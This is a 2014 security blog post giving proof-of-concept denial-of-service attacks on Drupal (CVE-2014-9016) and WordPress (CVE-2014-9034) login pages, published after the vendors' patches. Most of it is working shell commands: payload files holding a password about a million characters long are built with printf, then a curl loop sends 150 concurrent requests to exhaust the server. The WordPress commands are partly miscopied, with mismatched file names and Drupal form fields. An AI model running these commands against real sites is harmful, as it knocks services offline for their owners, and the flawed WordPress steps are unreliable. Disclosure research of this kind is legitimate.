CVE-2014-9016 and CVE-2014-9034 Proof of Concept ~ Hacking while you're asleep

Monday, December 01, 2014

CVE-2014-9016 and CVE-2014-9034 Proof of Concept

Assuming that time enough has happened since the security update was released by Wordpress and Drupal, we want to share our researches. As you already know, we believe in Responsible Disclosure and that is the reason why we didn't publish this post before.

Set Quality to 720p

Drupal Denial of Service CVE-2014-9016

Generate a pyaload and try with a non-valid user:

$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload

$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Generate a pyaload and try with a valid user:

$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

$ time curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Perform a Dos with a valid user:

$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done

Wordpress Denial of Service CVE-2014-9034

Generate a pyaload and try with a non-valid user:

$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload

$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Generate a pyaload and try with a valid user:

$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Perform a Dos with a valid user:

$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done

Python Code

https://github.com/c0r3dump3d/wp_drupal_timing_attack

References

http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html

http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html

http://www.devconsole.info/?p=1050

https://wordpress.org/news/2014/11/wordpress-4-0-1/

https://www.drupal.org/SA-CORE-2014-006

https://www.drupal.org/node/2378367

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016

Categories: 0-day, DoS, Drupal, phpass, vulnerability

Posted on Monday, December 01, 2014 by Javier Nieto

No comments

Hacking while you're asleep

BehindTheFirewalls is a blog where you can find all the latest information about hacking techniques, new trends in IT security and the recent products offered by security manufacturers. We'll talk about Firewalls, IPS, Botnets...

Monday, December 01, 2014